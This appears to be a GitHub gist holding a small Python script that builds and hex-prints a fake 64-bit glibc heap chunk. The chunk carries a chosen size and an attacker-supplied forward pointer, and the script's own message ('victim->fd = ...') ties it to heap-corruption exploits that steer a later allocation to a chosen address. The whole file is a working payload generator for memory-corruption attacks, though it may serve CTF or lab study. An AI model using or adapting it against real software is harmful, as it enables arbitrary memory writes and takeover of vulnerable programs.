Last active
January 4, 2019 21:34
#!/usr/bin/python | |
from __future__ import print_function | |
from sys import argv, stdout, stderr | |
import struct | |
# 64 bit only for now | |
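def print_chunk(chunkpos, size):
    """Print, hex-encoded, a byte layout shaped like a 64-bit heap chunk.

    The emitted bytes are, in order: 8 zero bytes, a one-byte size value
    with bit 0 set followed by 7 zero bytes, ``chunkpos`` zero-padded to
    8 bytes, and ``0x41`` filler bringing the total up to the rounded size.
    This presumably mirrors the prev_size / size / fd fields of a glibc
    malloc chunk (the caller's message names the third field
    ``victim->fd``) -- confirm against the allocator version in use.

    Args:
        chunkpos: Packed pointer bytes for the third 8-byte slot; the
            caller in this file builds it with ``struct.pack("<q", ...)``.
        size: Size in bytes; it is rounded up to the next multiple of 16.

    Raises:
        ValueError: If the rounded size does not fit in a single byte.
    """
    import binascii  # local import: hexlify behaves the same on Python 2 and 3

    # NOTE(review): a size that is already a multiple of 16 is still bumped
    # by a further 16 (112 -> 0x80). Kept as in the original; confirm whether
    # `size` is meant to be a request size or a final chunk size.
    rounded = (size + (16 - (size % 16))) | 0x1

    # The size field is written as one byte plus seven zero bytes, so only
    # values up to 0xff are representable. Fail with a clear message instead
    # of the opaque chr()/codec error the str-based version produced.
    if not 0 <= rounded <= 0xFF:
        raise ValueError(
            "rounded chunk size 0x%x does not fit in one byte" % rounded
        )

    # Accept text as well as bytes so that older callers passing a str of
    # raw byte values keep working on Python 3.
    if not isinstance(chunkpos, (bytes, bytearray)):
        chunkpos = chunkpos.encode("latin-1")

    layout = bytearray(8)                      # first 8-byte slot, all zero
    layout.append(rounded)                     # low byte of the size slot
    layout.extend(bytearray(7))                # remaining bytes of the size slot
    layout.extend(chunkpos)                    # third slot: caller-supplied bytes
    layout.extend(bytearray(max(0, 8 - len(chunkpos))))
    # Filler: rounded size minus the flag bit and the three 8-byte slots.
    # A negative count yields no filler, as with the original str repeat.
    layout.extend(b"\x41" * (rounded - 1 - 8 - 8 - 8))

    # str.encode('hex') exists only on Python 2; hexlify is portable.
    print(binascii.hexlify(bytes(layout)).decode("ascii"))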
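if __name__ == '__main__':
    # Command-line entry point: argv[1] is an address in hexadecimal and
    # argv[2] a size given either in decimal or with a 0x prefix.
    if len(argv) > 2:
        print(("[+] Next free is going to be: victim->fd = %s " % argv[1]), file=stderr)
        # "<q" packs a signed little-endian 64-bit value, so an address above
        # 0x7fffffffffffffff raises struct.error here.
        chunkpos = struct.pack("<q", int(argv[1], 16))
        size_arg = argv[2]
        # Detect the hex prefix case-insensitively: the original check missed
        # "0X70" and then failed in the base-10 conversion.
        size = int(size_arg, 16) if "0x" in size_arg.lower() else int(size_arg)
        print_chunk(chunkpos, size)
    else:
        # Too few arguments: show the expected invocation on stderr.
        print("Usage: %s 0x630142 112 [or 0x70]" % argv[0], file=stderr)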